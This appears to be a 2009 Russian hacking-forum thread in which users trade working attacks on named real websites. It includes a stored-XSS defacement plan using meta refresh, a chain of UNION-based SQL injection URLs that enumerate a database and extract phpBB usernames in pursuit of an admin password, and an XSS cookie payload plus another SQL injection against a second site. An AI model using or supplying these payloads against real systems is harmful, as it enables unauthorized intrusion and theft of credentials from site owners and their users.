13.01.2009, 15:32
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
Сообщение от Mixon
Ты хоть сам понял что написал? вопше хсс в основе не определенной странице,и точно что не на вводе логина и пасса,и думаешь ето АДМИНУ ЕТОГО САЙТА будет так беспотпально то что я сделаю?...
Я даже твой пост с трудом понимаю из-за количества ашипок.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
13.01.2009, 15:37
|
|
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
С нами:
9560218
Репутация:
238
|
|
Ну,я так пишу,такой лексикон у мну,ничё тут не сделаешь...) вопщем та идея с css никак не прокатит вопше......надо чтото другое думать(( Вопшем тут такой баг,тут с редактироваем инфы,поле Имя заносится в mysql,и в нем можно любой код писать,там без фильтров всё,xss отлично работает,ну вот что можно бы придумать окроме xss? потому что ето вап сайт,и тут хсс почти бесполезно,потому что там почти все с телфонов,где яваскрипт не идет...(
Последний раз редактировалось Mixon; 13.01.2009 в 15:42..
|
|
|
|
13.01.2009, 15:50
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
Сообщение от Mixon
Ну,я так пишу,такой лексикон у мну,ничё тут не сделаешь...) вопщем та идея с css никак не прокатит вопше......надо чтото другое думать(( Вопшем тут такой баг,тут с редактироваем инфы,поле Имя заносится в mysql,и в нем можно любой код писать,там без фильтров всё,xss отлично работает,ну вот что можно бы придумать окроме xss? потому что ето вап сайт,и тут хсс почти бесполезно,потому что там почти все с телфонов,где яваскрипт не идет...(
Meta refresh, как я писал выше, только его надо будет быстро удалить, или поработать некоторое время в качестве прокси, который будет этот редирект вырезать с отдаваемой страницы.
P.S.
А если перерисовать страницу стилями то вернуть всё обратно будет просто, т.к. тебе надо будет либо почистить тот CSS который инклудится, либо поставить display: none !important; на всё то что ты добавил на страницу, и display: block !important; на всё что убрал.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 13.01.2009 в 15:59..
|
|
|
|
13.01.2009, 18:11
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
С нами:
9634789
Репутация:
4
|
|
Народ, нужна помощь, есть скуля с таблами, есть табла phpbb_users, но она я так понял пустая....о воще все перебрал..не работают..помогите плиз, в чём ошибка?
версия 5.0.51a
скуля с таблами
Код:
http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%201,2,table_name,4,5,6,7%20FROM%20INFORMATION_SCHEMA.TABLES
нада логин и пасс админа
Последний раз редактировалось vakula; 13.01.2009 в 18:18..
|
|
|
|
13.01.2009, 18:35
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%2 01,2,table_schema,4,5,6,7+from+information_schema. tables+where+table_name=0x70687062625F7573657273
forumvdn
http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%2 01,2,database(),4,5,6,7
vdn
Таблица в другой базе
Поля
http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%2 01,2,column_name,4,5,6,7+from+information_schema.c olumns+where+table_name=0x70687062625F7573657273
Вот вывод
http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%2 01,2,username,4,5,6,7%20FROM%20forumvdn.phpbb_user s
А вот хелп на будующее:
https://forum.antichat.ru/showpost.php?p=1051237&postcount=4597
|
|
|
|
14.01.2009, 04:36
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
С нами:
9634789
Репутация:
4
|
|
Мужики, это уязвимость?
http://cronos.net.ru/qwests.php?id=1'
|
|
|
|
14.01.2009, 04:40
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 278
С нами:
9230726
Репутация:
242
|
|
Сообщение от vakula
Мужики, это уязвимость?
http://cronos.net.ru/qwests.php?id=1'
раскрытие путей, не более
|
|
|
|
14.01.2009, 04:48
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами:
10077446
Репутация:
1020
|
|
Сообщение от vakula
Мужики, это уязвимость?
http://cronos.net.ru/qwests.php?id=1'
open_basedir ()
xss
http://cronos.net.ru/database.php?type=%3Cscript%3Ealert(document.cooki e)%3C/script%3E
Последний раз редактировалось AkyHa_MaTaTa; 14.01.2009 в 04:56..
|
|
|
|
14.01.2009, 06:05
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Сообщение от vakula
Мужики, это уязвимость?
http://cronos.net.ru/qwests.php?id=1'
Там рядом скуля...
Код:
http://cronos.net.ru/database.php?id=4664+union+select+1,unhex(hex(version())),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22--
а не подскажите прогу для поиска sql уязвимостей на сайте?
а язна, гугль рулит....но хотелось бы ваши личные советы
Руки ^^
|
|
|
|
14.01.2009, 08:37
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
С нами:
9634789
Репутация:
4
|
|
Сообщение от R1dex
Там рядом скуля...
Код:
http://cronos.net.ru/database.php?id=4664+union+select+1,unhex(hex(version())),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22--
а как в таком случае прописывать таблу? from users? или в хексе?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
